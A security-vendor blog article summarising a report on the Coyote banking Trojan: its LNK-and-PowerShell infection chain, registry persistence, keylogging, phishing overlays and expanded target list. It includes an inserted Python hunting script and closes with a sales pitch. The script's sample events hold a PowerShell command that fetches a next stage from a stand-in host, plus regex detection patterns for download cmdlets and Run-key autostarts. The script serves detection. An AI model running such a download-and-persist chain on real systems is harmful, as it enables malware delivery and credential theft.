
Coyote Malware Surge: A New Threat to Financial Security

John Jordan

A recent cybersecurity report reveals that Coyote malware has significantly expanded its reach, now targeting over 1,000 websites and 73 financial institutions, primarily affecting Brazilian Windows users. This banking Trojan is capable of executing various malicious activities, including keylogging and phishing, posing a serious threat to financial security.


Key Takeaways

  • Coyote malware now targets 1,030 sites and 73 financial institutions.

  • The malware employs complex multi-staged infection processes.

  • It utilizes PowerShell commands to deliver its payload and evade detection.

Overview of Coyote Malware

Coyote malware, first documented by Kaspersky in early 2024, has evolved into a formidable threat, particularly for users in Brazil. The malware is designed to harvest sensitive information from a wide array of financial applications, making it a significant concern for cybersecurity experts.

Infection Process

The infection process of Coyote malware is intricate and multi-staged. It begins with a Windows Shortcut (LNK) file that executes a PowerShell command to retrieve the next stage from a remote server. This command triggers a series of actions that ultimately lead to the execution of the malicious payload.

  1. Initial Access: The LNK file is the entry point, executing a PowerShell command.

  2. Payload Delivery: The command retrieves additional scripts from a remote server.

  3. Execution: The malware establishes persistence by modifying the Windows registry, ensuring it runs on system startup.
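A defender can hunt for this chain by correlating process-creation and registry events. The sketch below is an added example, not code from the article or the underlying report: the events are constructed, they use simplified Sysmon-style fields, and it assumes PowerShell is started directly by explorer.exe (as when a shortcut is opened) and that persistence lands in the standard Run/RunOnce keys, which the article does not name.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events with Sysmon field names (ID 1 = process create,
# ID 13 = registry value set); "guid" stands in for ProcessGuid.
EVENTS = [
    {"id": 1, "time": "2025-01-10T09:00:01", "host": "WS-01", "guid": "A1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient)"
                    ".DownloadString('https://stage.example/next')"},
    {"id": 13, "time": "2025-01-10T09:00:40", "host": "WS-01", "guid": "A1",
     "TargetObject": r"HKU\S-1-5-21-0\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"id": 1, "time": "2025-01-10T09:05:00", "host": "WS-02", "guid": "B7",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users"},
    {"id": 13, "time": "2025-01-10T09:06:00", "host": "WS-02", "guid": "C3",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
]

DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                      r"net\.webclient|start-bitstransfer|invoke-restmethod", re.I)
# Assumption: standard Run/RunOnce autostart keys; the article names no key.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
WINDOW = timedelta(minutes=5)

def hunt(events):
    """Return alerts where a shortcut-style PowerShell download is followed by
    an autostart registry write from the same process within WINDOW."""
    suspects, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["guid"])
        if ev["id"] == 1:
            ps = ev["Image"].lower().endswith(("powershell.exe", "pwsh.exe"))
            from_shell = ev["ParentImage"].lower().endswith("explorer.exe")
            if ps and from_shell and DOWNLOAD.search(ev["CommandLine"]):
                suspects[key] = (ts, ev["CommandLine"])
        elif ev["id"] == 13 and key in suspects and RUN_KEY.search(ev["TargetObject"]):
            started, cmd = suspects[key]
            if ts - started <= WINDOW:
                alerts.append({"host": ev["host"], "command": cmd,
                               "autostart": ev["TargetObject"]})
    return alerts

if __name__ == "__main__":
    for alert in hunt(EVENTS):
        print(alert)
```

Only the WS-01 pair is flagged; the benign PowerShell session and the unrelated Run key write on WS-02 are ignored because neither completes the chain on its own.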

Capabilities of Coyote Malware

Once deployed, Coyote malware can perform a variety of malicious activities, including:

  • Keylogging: Capturing keystrokes to steal sensitive information.

  • Screenshot Capture: Taking screenshots to gather user data.

  • Phishing Overlays: Displaying fake login screens to trick users into providing credentials.

The malware also gathers basic system information and checks for installed antivirus products, which helps it evade detection.

Expanded Target List

The latest iteration of Coyote malware has broadened its target list, now encompassing:

  • 1,030 Websites: Including popular platforms like mercadobitcoin.com.br and bitcointrade.com.br.

  • 73 Financial Institutions: Targeting various financial services to maximize its impact.

When a victim attempts to access any of the targeted sites, the malware communicates with an attacker-controlled server to determine the next steps, which may include capturing screenshots or activating a keylogger.

Coyote malware represents a significant threat to financial cybersecurity, particularly in Brazil. Its ability to expand its target list and employ sophisticated infection techniques makes it a formidable adversary for both users and cybersecurity professionals. As the malware landscape continues to evolve, vigilance and proactive measures are essential to safeguard sensitive information from such threats.

Cybersecurity is more crucial than ever. At BetterWorld Technology, we provide advanced solutions to tackle emerging threats while fostering innovation. Secure your business with confidence—contact us today for a consultation.

Sources

  • Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions, The Hacker News.
